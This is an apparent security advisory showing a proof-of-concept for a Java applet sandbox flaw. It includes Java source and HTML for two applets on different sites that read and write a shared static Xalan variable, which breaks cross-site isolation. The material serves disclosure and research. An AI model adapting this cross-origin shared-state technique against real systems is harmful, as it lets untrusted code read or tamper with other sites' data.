|
|
Sun Java Cross-Site Applet Sandbox Security Model Violation Vulnerability
The following proof-of-concept was provided to demonstrate that there is a violation of the Java sandbox security model: Two applets, - one on siteA: www.siteA.org => Read.html / ReadApplet.class - one on siteB: www.siteB.org => Write.html / WriteApplet.class Applet from siteB can share a variable also accessible (read and write) which is used by siteA. So data protection is not guaranteed, an unsigned applet may grab data stored in this variable by a signed applet or interfere it's XML processing and therefore violates the isolation restriction of the sandbox. ==========READAPPLET========================= /* Illegalaccess.org java exploit */ /* coded by Marc Schoenefeld */ import java.awt.Graphics; public class ReadApplet extends java.applet.Applet { public void paint(Graphics g) { System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION); } static { System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION); } } ==========READAPPLET========================= ==========WRITEAPPLET========================= import java.awt.Graphics; public class WriteApplet extends java.applet.Applet { public void paint(Graphics g) { org.apache.xalan.processor.XSLProcessorVersion.S_VERSION += "a"; } static { org.apache.xalan.processor.XSLProcessorVersion.S_VERSION = "altered from SiteA"; } } ==========WRITEAPPLET========================= =========Write.html============================ <HTML> <BODY BGCOLOR=#66FF66> <PRE> WriteApplet, write to variable Marc (marc@org.illegalaccess) </PRE> <applet codebase=. code=WriteApplet.class width=100 height=100> </applet> </BODY> </HTML> ========Read.html============================= <HTML> <BODY BGCOLOR=#6666FF> <PRE> ReadApplet, read from variable Marc (marc@org.illegalaccess) </PRE> <applet codebase=. code=ReadApplet.class width=100 height=100> </applet> </BODY> </HTML> |
|
Privacy Statement |